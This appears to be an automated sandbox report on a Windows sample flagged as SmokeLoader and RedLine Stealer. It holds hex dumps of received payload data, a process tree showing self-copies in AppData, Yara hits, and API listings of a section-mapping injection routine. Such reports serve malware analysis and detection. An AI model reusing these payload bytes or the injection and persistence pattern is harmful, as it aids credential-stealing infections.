2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 9f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 ba 41 00 56 53 88 1d ec bb 41 00 ff 15 94 70 41 00 a1 60 9f b1 02 89 35 a4 b2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 b2 41 00 89 35 8c b2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 bb 41 00 83 ec 0c 53 56 8b 35 44 71 41 00 57 33 db 33 ff 3b c3 75 2e ff Data Ascii: tBUME^[t US3VW9puhAVSApA`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DqAW33;u.
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 70 41 00 8d 85 28 fd ff ff 50 ff 15 d4 70 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80 Data Ascii: ffffffuE0@jPjPe(0j@,pA(PpAjUuMEMUTu}tMA#E3t3@
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 1f b3 d1 2a 19 25 fe 23 4d 60 90 5a 20 76 db 24 a1 cc 22 63 da 4a 44 80 3e 66 82 4b fa da 94 df 3f 8c ad 25 29 6d f9 07 97 96 5b 03 1b 36 2f c7 2e 68 0d 1e 80 19 b4 47 0e 09 f0 31 45 b4 67 43 4a 3c 00 85 ee cc 8b 12 c6 e6 a5 73 e3 ab f7 82 5b 6d 33 49 06 43 14 1d 6a a5 30 06 f9 8b 93 53 cf 5b b8 bb ee 09 31 15 7e cb 51 be b9 b7 0a 03 88 d5 fe 0e 43 9b f6 9e c8 3c 62 fd 9f bd 9b e6 98 f2 9b 37 c2 84 84 50 5f 02 4e d1 08 b8 f8 28 6e 8c d3 34 06 06 87 75 96 cc 39 f3 61 a5 ce d9 cb 51 c8 b5 2a 14 f0 40 3a 6c ac 4c a1 33 f9 f2 c0 0b cb 76 c1 d2 f7 c1 58 fd 87 4b e9 37 21 47 fd e6 e0 7f 95 fb 9c 1c 9d f2 be 71 70 24 4b 67 b4 0d 6b 50 48 92 36 6d b4 26 0d c1 c8 d5 c6 fd 2b a0 a5 00 d1 cf 72 ad 18 73 65 35 09 02 f7 cd 74 2f ce 8b 83 6f b0 e8 03 6f 9a 5e b1 c5 2f Data Ascii: %#M`Z v$"cJD>fK?%)m[6/.hG1EgCJ<s[m3ICj0S[1~QC<b7P_N(n4u9aQ@:lL3vXK7!Gqp$KgkPH6m&+rse5t/oo^/
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 8d 1c cf c3 47 24 a2 3e 12 2b 4d 60 cf 50 35 9b bb ed 13 05 fe 95 df 50 64 cb 31 3e 61 8a f4 d1 dc 50 fe a5 1a 3d 31 0b 33 cb e7 0f fc 56 40 70 b4 1a 47 30 eb 84 98 7d ed ac 5b a9 50 65 7f 0a 86 52 aa f3 29 df af 80 ab 8f 41 be 15 a3 b7 98 58 82 61 f5 3e 54 29 b6 e6 16 a7 f8 4b 8b 6b 88 d4 42 55 37 b9 be 05 16 55 16 04 e4 fe d6 b8 c5 59 72 61 9f 0c 6f dd cf 11 41 a2 91 fb bd 83 2d 95 87 90 2d b6 6a fa f3 5e e5 44 d6 71 eb e2 8b 02 dc 67 32 d0 ec fa 96 dd 47 6d 05 55 8e 0f b3 1b 12 45 0c 0a 8b f7 e7 0a a7 67 93 74 65 3f 6b 78 74 73 82 44 9f dc 52 1f 89 2f 17 0b 75 17 d7 c6 7e d4 37 3b 84 49 b0 cd 0e bd 91 b0 c9 1e 8e 7a 45 86 58 4f c4 4b f2 af a0 6a 17 8a fb db 38 f4 13 de f2 48 1e c3 96 54 a5 d4 e7 df c8 48 ac 15 53 ee dc c1 38 d8 17 1e 73 6c 59 35 ab f3 Data Ascii: G$>+M`P5Pd1>aP=13V@pG0}[PeR)AXa>T)KkBU7UYraoA--j^Dqg2GmUEgte?kxtsDR/u~7;IzEXOKj8HTHS8slY5
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: eb 51 34 f7 df f3 07 72 44 cd 59 05 39 a2 54 60 49 69 a5 12 6d 9f 62 00 a7 db 94 30 e9 ed 09 dd 9c 9b f3 04 5c 87 70 a0 02 d6 ca 5c dd 48 30 9d 84 8f c7 03 8d 02 ab 64 0c e9 66 c1 d2 08 fc 09 8d 8a bc e8 fb 8f f6 c6 24 b4 ea 15 83 a3 32 ca 91 ef 3d e8 6a fc 82 11 10 61 1d d3 f5 20 20 a1 c3 cd 71 ec 03 ec da 40 41 33 1d c2 8c ba 84 6c 52 1a 19 6d c7 93 2b 23 44 3a 5d ce 69 71 1a de 3b f0 12 fd 91 ac d3 54 d1 ed 2b 24 fe e9 80 fa 3f ba 10 33 07 74 b3 59 95 47 20 44 b6 5c d4 7c 2e 26 17 d9 c7 4a 08 bc 26 78 4d 2f eb b7 aa 77 ec d7 ae 47 a6 b6 8c bc 98 f0 ed 1d 41 06 86 95 86 35 b3 b9 89 af 45 8b 50 5d 59 ab 79 6b 7b 19 49 62 59 7f 90 b5 0e c6 d6 18 b5 74 b1 55 77 6e 47 5b 14 be 65 e7 de b0 47 03 54 67 b8 fc aa 7c bf 20 f8 3e 49 32 2d c0 36 dc 09 a1 0f 73 6e Data Ascii: Q4rDY9T`Iimb0\p\H0df$2=ja q@A3lRm+#D:]iq;T+$?3tYG D\\|.&J&xM/wGA5EP]Yyk{IbYtUwnG[eGTg\| >I2-6sn
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 3b 0f 32 0d b7 73 94 06 85 c9 8f 88 1b bd 5d 9a d1 c7 53 b3 4a 6c da 71 6a 59 ba 3a 69 e1 ff 36 90 c2 72 b4 c6 88 45 41 cf 49 c1 6f 35 8d 6c ee 6e b1 54 0d 2b 63 0b b4 f5 7a 36 48 1c 37 78 d5 d9 c1 21 35 18 44 8e b4 9e 57 4d 8f 2d c5 bf ac 5c e7 bf d2 6b 1a d9 81 3e b4 12 0f ac 06 ea 8e d3 7d a8 b3 73 5f c9 05 10 e9 5a e7 a2 03 b8 da 1e f5 e1 39 e7 f1 33 d0 13 ab 22 7d 68 55 d9 44 a1 4b 3b 0a a9 00 cf 05 92 39 67 ef ba 88 f6 74 6c d6 15 22 35 2f e7 37 65 c7 9d 04 c4 de f8 1f 91 f7 60 36 49 50 04 69 0b d3 aa f4 87 b8 ec 3e 3d 31 4a 38 dd 02 50 8a 94 6c 60 d0 9a d2 98 11 4e 7c ee f6 a1 d6 ba a6 70 bc 9e 45 dc 2d 4c 84 38 47 40 e4 f3 41 f7 c4 d1 36 19 91 ae e6 79 bb 58 72 27 3c 29 be da be 52 b9 f2 20 55 41 6c c0 1d 07 f9 be 95 e9 66 83 33 68 ba f1 fd 53 fa Data Ascii: ;2s]SJlqjY:i6rEAIo5lnT+cz6H7x!5DWM-\k>}s_Z93"}hUDK;9gtl"5/7e`6IPi>=1J8Pl`N\|pE-L8G@A6yXr'<)R UAlf3hS
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: f9 59 d0 23 23 42 31 ec 74 d1 b9 16 4c 36 49 d6 23 02 66 fe c9 68 69 b9 6a b8 c9 25 77 af 32 15 b1 2c 78 de ef 30 5c 34 f6 91 4e e7 83 01 9c 46 cf 02 c5 6d 14 fe d8 86 c4 1c 33 df 2f f2 76 db e6 b8 c6 c0 27 b2 a6 bc f6 90 33 ac b7 b0 3b 10 6d 31 30 43 ac 3f aa df 58 43 2d 33 c1 77 e4 3b 8d 67 bc f6 1a b2 51 24 41 ac 8a f6 7d 6b 50 bc 53 f2 e3 b8 25 4a 6a 56 0d e3 dc 00 1b 34 24 0d 08 25 93 2c 75 09 3e b9 16 da f2 da 8f da dc 87 77 08 5e 3b 26 bc e1 86 b1 3a 60 7e 32 20 82 d5 a2 5d 1a 3f 88 84 b7 ff a7 cb 53 28 4b b9 70 cd 69 3f b9 35 f0 57 95 0c b6 16 8d 8d f3 4e d8 8d 20 25 3d 0a d4 f6 73 bb b4 32 ff 4d 38 1a f8 65 cd c0 1b e3 37 59 89 f0 c5 e9 4a 24 1f 8d 6a ee b7 d2 8a 1e 28 be d2 a5 c6 e5 96 7c 29 46 dd 89 67 42 60 97 d0 5c 7f 90 15 ce 67 a0 fe 29 86 Data Ascii: Y##B1tL6I#fhij%w2,x0\4NFm3/v'3;m10C?XC-3w;gQ$A}kPS%JjV4$%,u>w^;&:`~2 ]?S(Kpi?5WN %=s2M8e7YJ$j(\|)FgB`\g)
2024-10-12 21:28:10 UTC	8000	IN	Data Raw: 93 9d 48 ad 0f 23 cc 41 fd 54 72 44 94 67 b5 fa 3a 68 c0 3f 37 b4 01 55 71 99 dd 34 37 be 21 58 23 04 43 9d 27 c0 10 df 54 53 7d b7 01 3c f2 8c ad fd 70 8a 99 3d 1b 3f df 60 2e b1 09 dd d3 f7 25 16 31 9b 4f 8f 91 54 ce af 19 34 fa b1 19 cc c7 87 84 ad 3c 5d 7e 59 d5 f3 27 2e 09 e9 07 63 3c 59 85 bf ba eb b5 46 6b 2a 9b 9c 0d 57 00 d1 4b 53 0d d5 41 b8 d3 de e2 dd b1 e8 73 22 dc 47 73 d4 d0 54 2d 3b 29 fc cd 9a 67 62 39 fe 08 75 a9 12 86 c6 05 35 29 ff ee f4 0a b0 a1 f3 29 80 59 62 09 4f 27 31 21 f5 e2 39 06 a6 fe ba bd a5 5a 94 29 6a 41 26 53 dd 94 a1 0b 6d ee 87 92 6c 08 08 48 11 4f 69 60 87 60 1b 6b bb 48 5a db 0d 10 2d 71 50 37 ab 40 3a e8 84 cc 3d 79 1b 80 a8 46 84 51 7c e3 7e fd 19 0a 9b 52 41 fc 51 c8 d3 6f c8 75 54 8a 37 e0 40 02 45 9a 4b 96 e2 3d Data Ascii: H#ATrDg:h?7Uq47!X#C'TS}<p=?`.%1OT4<]~Y'.c<YFk*WKSAs"GsT-;)gb9u5))YbO'1!9Z)jA&SmlHOi``kHZ-qP7@:=yFQ\|~RAQouT7@EK=

Target ID:	0
Start time:	17:27:03
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\LgigaSKsL6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LgigaSKsL6.exe"
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	C61F76C54CE0F89894EF870A48C5497C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:27:12
Start date:	12/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	17:27:32
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\vsvrjra
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vsvrjra
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	C61F76C54CE0F89894EF870A48C5497C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:28:09
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\A869.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\A869.exe
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	E3C51CB2EE848A9BED855AB3E756CD82
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:28:36
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\ajvrjra
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ajvrjra
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	E3C51CB2EE848A9BED855AB3E756CD82
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:30:01
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\vsvrjra
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vsvrjra
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	C61F76C54CE0F89894EF870A48C5497C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	17:30:01
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\ajvrjra
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ajvrjra
Imagebase:	0x400000
File size:	243'712 bytes
MD5 hash:	E3C51CB2EE848A9BED855AB3E756CD82
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	31.9%
Signature Coverage:	42.9%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00415C20 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415CF2
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D0B
FindAtomW.KERNEL32(00000000), ref: 00415D12
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D1A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415D32
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415D59
MoveFileW.KERNEL32(00000000,00000000), ref: 00415D61
GetVersionExW.KERNEL32(?), ref: 00415D6E
DisconnectNamedPipe.KERNEL32(?), ref: 00415D81
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415DC6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415DD5
LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415DEB
PulseEvent.KERNEL32(00000000), ref: 00415DFB
SetCommState.KERNELBASE(00000000,00000000), ref: 00415E24
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415E55
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415E66
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415E6E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415EAE
GetFileAttributesA.KERNEL32(00000000), ref: 00415EB5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415EBB
GetBinaryType.KERNEL32(0041842C,?), ref: 00415ECD
LoadLibraryA.KERNELBASE(00418438), ref: 00415F52

Strings

k`, xrefs: 00415F83
}$, xrefs: 00415FA7

Memory Dump Source

Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
Instruction ID: 9088986ea41186524788a2102304772e7f24ba617efa9d05027aa238ecf44273
Opcode Fuzzy Hash: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
Instruction Fuzzy Hash: 6BA1E371845A24EBC720DB65EC44ADF7BB8EF89751F40406AF50AA7190DB381A81CFED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
